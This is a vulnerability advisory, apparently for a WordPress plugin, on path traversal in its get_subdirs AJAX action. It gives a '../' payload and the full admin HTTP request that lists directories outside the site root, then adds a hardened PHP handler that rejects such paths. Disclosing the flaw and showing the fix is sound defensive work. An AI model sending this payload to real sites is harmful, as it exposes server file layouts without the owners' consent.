The plugin does not sanitize the dir parameter when handling the get_subdirs AJAX action, allowing high-privileged users such as admins to inspect the names of files and directories outside the site's root.
- Payload: ../../../../../../../../../../../../../../../../../../../
- At the "Other directory" function, select a directory, then set the dir parameter to the payload above.
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 102
Cookie: [Admin+]
action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../
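As an added example (not the plugin's own code, which the advisory does not show), a hardened PHP handler for this kind of AJAX action that resolves the requested directory and rejects any value that lands outside the site root. ABSPATH is WordPress's own constant; the nonce action name, capability, function names and response format are assumptions.

```php
<?php
// Added illustration, not the plugin's code: a get_subdirs-style handler that
// refuses "dir" values resolving outside the site root.
// Assumed: nonce action 'iowd_nonce', capability 'manage_options', function names.

function iowd_example_resolve_subdir(string $base, string $dir) {
    // Canonicalise the base (symlinks and "." segments collapsed), trailing separator added.
    $base_real = realpath($base);
    if ($base_real === false) {
        return null;
    }
    $base_real = rtrim($base_real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // Canonicalise the requested path the same way so any "../" sequence is resolved.
    $target = realpath($base_real . $dir);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    $target_sep = rtrim($target, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // Containment check on the resolved paths, not on the raw string: stripping
    // "../" textually would miss encoded or nested forms, prefix comparison does not.
    if (strncmp($target_sep, $base_real, strlen($base_real)) !== 0) {
        return null;
    }
    return $target;
}

function iowd_example_get_subdirs() {
    // Capability and nonce checks come first; the path check below is in addition.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    check_ajax_referer('iowd_nonce', 'nonce_iowd');

    $dir      = isset($_POST['dir']) ? (string) wp_unslash($_POST['dir']) : '';
    $resolved = iowd_example_resolve_subdir(ABSPATH, $dir);
    if ($resolved === null) {
        // A "../../../.." payload resolves above ABSPATH and is rejected here.
        wp_send_json_error('invalid directory', 400);
    }

    $subdirs = array_map('basename', glob($resolved . '/*', GLOB_ONLYDIR));
    wp_send_json_success($subdirs);
}
add_action('wp_ajax_get_subdirs', 'iowd_example_get_subdirs');
```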